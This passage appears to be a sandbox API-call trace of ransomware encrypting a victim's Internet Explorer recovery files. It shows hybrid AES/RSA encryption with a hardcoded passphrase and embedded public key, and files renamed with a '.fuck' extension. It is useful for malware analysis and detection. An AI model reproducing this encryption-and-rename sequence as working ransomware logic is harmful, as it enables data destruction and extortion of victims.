nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.804] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.805] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0267.805] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.805] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.805] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0267.805] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.805] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.805] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0267.805] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.805] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.805] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0267.805] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.805] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.805] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0267.806] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.806] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.806] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0267.806] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.806] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x180, lpOverlapped=0x0) returned 1 [0267.806] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x180, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x190) returned 1 [0267.806] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x190, lpOverlapped=0x0) returned 1 [0267.806] CloseHandle (hObject=0x5d4c) returned 1 [0267.806] CloseHandle (hObject=0x5d3c) returned 1 [0267.806] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{63E26EB7-6816-11E7-9BD2-C40142ECDE47}.dat.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{63e26eb7-6816-11e7-9bd2-c40142ecde47}.dat.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{63E26EB7-6816-11E7-9BD2-C40142ECDE47}.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{63e26eb7-6816-11e7-9bd2-c40142ecde47}.dat"), bFailIfExists=0) returned 1 [0267.809] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{63E26EB7-6816-11E7-9BD2-C40142ECDE47}.dat", dwFileAttributes=0x0) returned 1 [0267.810] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{63E26EB7-6816-11E7-9BD2-C40142ECDE47}.dat.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{63e26eb7-6816-11e7-9bd2-c40142ecde47}.dat.gsg")) returned 1 [0267.812] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{63E26EB7-6816-11E7-9BD2-C40142ECDE47}.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{63e26eb7-6816-11e7-9bd2-c40142ecde47}.dat"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{63E26EB7-6816-11E7-9BD2-C40142ECDE47}.dat.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{63e26eb7-6816-11e7-9bd2-c40142ecde47}.dat.fuck")) returned 1 [0267.829] CryptDestroyHash (hHash=0x2e7f8c0) returned 1 [0267.829] CryptDestroyKey (hKey=0x2e7f1c0) returned 1 [0267.829] CryptReleaseContext (hProv=0x2f25020, dwFlags=0x0) returned 1 [0267.829] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0267.829] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0267.830] GetLastError () returned 0x0 [0267.830] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{94C50253-C9AC-11E7-9BDD-C40142ECDE47}.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{94c50253-c9ac-11e7-9bdd-c40142ecde47}.dat")) returned 0x20 [0267.830] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{94C50253-C9AC-11E7-9BDD-C40142ECDE47}.dat", dwFileAttributes=0x80) returned 1 [0267.831] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{94C50253-C9AC-11E7-9BDD-C40142ECDE47}.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{94c50253-c9ac-11e7-9bdd-c40142ecde47}.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0267.832] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{94C50253-C9AC-11E7-9BDD-C40142ECDE47}.dat.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{94c50253-c9ac-11e7-9bdd-c40142ecde47}.dat.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0267.833] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{94C50253-C9AC-11E7-9BDD-C40142ECDE47}.dat.gsg", dwFileAttributes=0x2) returned 1 [0267.834] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f254e8) returned 1 [0267.836] CryptCreateHash (in: hProv=0x2f254e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0267.836] lstrlenA (lpString="ENarQtORUWLZSNndbbyWVVoTzMlQm") returned 29 [0267.836] CryptHashData (hHash=0x2e7f140, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0267.836] CryptDeriveKey (in: hProv=0x2f254e8, Algid=0x6610, hBaseData=0x2e7f140, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2e7f1c0) returned 1 [0267.837] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0267.837] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0267.837] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f25680) returned 1 [0267.837] CryptImportPublicKeyInfo (in: hCryptProv=0x2f25680, dwCertEncodingType=0x1, pInfo=0x2f314c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f314f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f314f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2e7f3c0) returned 1 [0267.837] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0267.837] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f24d78*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f24d78*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0267.837] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f24d78*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f24d78*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0267.839] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.852] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0267.853] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.864] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.864] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0267.864] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.864] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.864] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0267.865] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.865] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.865] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0267.865] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.865] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.865] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0267.865] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.865] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.865] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0267.866] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.866] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.866] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0267.866] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.866] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.866] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0267.866] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.866] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.866] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0267.866] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.866] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.867] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0267.867] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.867] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.867] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0267.867] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.867] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.867] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0267.867] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.867] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.867] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0267.867] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.868] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.868] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0267.868] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.868] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x100, lpOverlapped=0x0) returned 1 [0267.868] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x100, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x110) returned 1 [0267.868] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x110, lpOverlapped=0x0) returned 1 [0267.868] CloseHandle (hObject=0x5d3c) returned 1 [0267.868] CloseHandle (hObject=0x5d4c) returned 1 [0267.869] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{94C50253-C9AC-11E7-9BDD-C40142ECDE47}.dat.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{94c50253-c9ac-11e7-9bdd-c40142ecde47}.dat.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{94C50253-C9AC-11E7-9BDD-C40142ECDE47}.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{94c50253-c9ac-11e7-9bdd-c40142ecde47}.dat"), bFailIfExists=0) returned 1 [0267.872] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{94C50253-C9AC-11E7-9BDD-C40142ECDE47}.dat", dwFileAttributes=0x0) returned 1 [0267.872] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet 